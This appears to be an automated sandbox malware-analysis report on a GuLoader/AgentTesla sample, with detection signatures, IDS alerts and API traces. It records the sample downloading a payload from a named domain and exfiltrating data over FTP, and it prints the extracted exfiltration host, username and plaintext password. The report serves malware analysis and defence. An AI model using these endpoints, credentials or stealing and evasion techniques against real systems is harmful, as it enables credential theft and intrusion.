Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rendel#U00e9s_1023200000000000305.exe

Overview

General Information

Sample name:rendel#U00e9s_1023200000000000305.exe
renamed because original name is a hash value
Original sample name:rendels_1023200000000000305.exe
Analysis ID:1571444
MD5:ff83f495808f8837a41405726ce9d7b9
SHA1:186bb042c4a61b7905ed62bde58f062725897192
SHA256:186a1d9c4703d9498b26d88451e31018ff66b7f9f135e0ed93f9ac10aa485753
Tags:exeguloaderHUNuser-smica83
Infos:

Detection

AgentTesla, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected GuLoader
AI detected suspicious sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Exfil Mode": "FTP", "Host": "ftp://ftp.carbognin.it", "Username": "server@carbognin.it", "Password": "59Cif8wZUH#X"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2171267771.000000000074C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
      00000002.00000002.3300694106.0000000032B2F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000002.00000002.3300694106.0000000032AE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000002.3300694106.0000000032AE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000000.00000002.2172384343.000000000323D000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
              Click to see the 4 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-09T11:51:25.411752+010020299271A Network Trojan was detected192.168.2.54972086.107.36.9321TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-09T11:51:26.587377+010028555421A Network Trojan was detected192.168.2.54972886.107.36.9335590TCP
              2024-12-09T11:51:26.708391+010028555421A Network Trojan was detected192.168.2.54972886.107.36.9335590TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-09T11:51:18.116653+010028032702Potentially Bad Traffic192.168.2.549707185.33.55.2680TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: rendel#U00e9s_1023200000000000305.exeAvira: detected
              Source: rendel#U00e9s_1023200000000000305.exe.3840.0.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.carbognin.it", "Username": "server@carbognin.it", "Password": "59Cif8wZUH#X"}
              Source: rendel#U00e9s_1023200000000000305.exeReversingLabs: Detection: 13%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: rendel#U00e9s_1023200000000000305.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: rendel#U00e9s_1023200000000000305.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_00405D74
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_0040290B FindFirstFileW,2_2_0040290B
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_0040699E FindFirstFileW,FindClose,2_2_0040699E

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49728 -> 86.107.36.93:35590
              Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49720 -> 86.107.36.93:21
              Source: global trafficTCP traffic: 192.168.2.5:49728 -> 86.107.36.93:35590
              Source: Joe Sandbox ViewIP Address: 86.107.36.93 86.107.36.93
              Source: Joe Sandbox ViewASN Name: DIALTELECOMRO DIALTELECOMRO
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49707 -> 185.33.55.26:80
              Source: unknownFTP traffic detected: 86.107.36.93:21 -> 192.168.2.5:49720 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 80 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 80 allowed.220-Local time is now 11:51. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 80 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 80 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 26 of 80 allowed.220-Local time is now 11:51. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
              Source: global trafficHTTP traffic detected: GET /image-temp/prkaeoKWqORQXnyaAAmokgBr233.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: akonnyuszerkezet.huCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /image-temp/prkaeoKWqORQXnyaAAmokgBr233.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: akonnyuszerkezet.huCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: akonnyuszerkezet.hu
              Source: global trafficDNS traffic detected: DNS query: ftp.carbognin.it
              Source: rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3280464219.0000000002930000.00000004.00001000.00020000.00000000.sdmp, rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3280216832.0000000002674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://akonnyuszerkezet.hu/image-temp/prkaeoKWqORQXnyaAAmokgBr233.bin
              Source: rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3280216832.0000000002674000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://akonnyuszerkezet.hu/image-temp/prkaeoKWqORQXnyaAAmokgBr233.biny
              Source: rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3300694106.0000000032B3D000.00000004.00000800.00020000.00000000.sdmp, rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3300694106.0000000032B2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.carbognin.it
              Source: rendel#U00e9s_1023200000000000305.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3300694106.0000000032B2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_00403640
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile created: C:\Windows\resources\0809Jump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile created: C:\Windows\resources\funksJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile created: C:\Windows\resources\funks\viklingerneJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 0_2_00406D5F0_2_00406D5F
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 0_2_6FC61BFF0_2_6FC61BFF
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_00406D5F2_2_00406D5F
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_001193F42_2_001193F4
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_00114A582_2_00114A58
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_0011CB382_2_0011CB38
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_00113E402_2_00113E40
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_001141882_2_00114188
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_00119BC82_2_00119BC8
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_357CBCD02_2_357CBCD0
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_357C3F382_2_357C3F38
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_357C00402_2_357C0040
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_357CDBF92_2_357CDBF9
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_357C2AF02_2_357C2AF0
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_357C4FE02_2_357C4FE0
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_357C32232_2_357C3223
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_35C9CA302_2_35C9CA30
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_35C9B7802_2_35C9B780
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_35C9FA4C2_2_35C9FA4C
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_35C9A1982_2_35C9A198
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_00119EA52_2_00119EA5
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: String function: 00402DA6 appears 51 times
              Source: rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3280216832.0000000002699000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs rendel#U00e9s_1023200000000000305.exe
              Source: rendel#U00e9s_1023200000000000305.exe, 00000002.00000002.3300615018.0000000032929000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs rendel#U00e9s_1023200000000000305.exe
              Source: rendel#U00e9s_1023200000000000305.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/9@2/2
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_00403640
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularlyJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeMutant created: NULL
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile created: C:\Users\user\AppData\Local\Temp\nsr3831.tmpJump to behavior
              Source: rendel#U00e9s_1023200000000000305.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: rendel#U00e9s_1023200000000000305.exeReversingLabs: Detection: 13%
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile read: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe "C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe"
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess created: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe "C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe"
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeProcess created: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe "C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exe"Jump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
              Source: rendel#U00e9s_1023200000000000305.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000000.00000002.2172384343.000000000323D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3278956920.00000000017CD000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2171267771.000000000074C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rendel#U00e9s_1023200000000000305.exe PID: 3840, type: MEMORYSTR
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 0_2_6FC61BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6FC61BFF
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 0_2_6FC630C0 push eax; ret 0_2_6FC630EE
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeCode function: 2_2_357C3AD3 push ebx; retf 2_2_357C3ADA
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile created: C:\Users\user\AppData\Local\Temp\nsm3A84.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularlyJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\UdredningJump to behavior
              Source: C:\Users\user\Desktop\rendel#U00e9s_1023200000000000305.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\AmbilevousJump to behavior
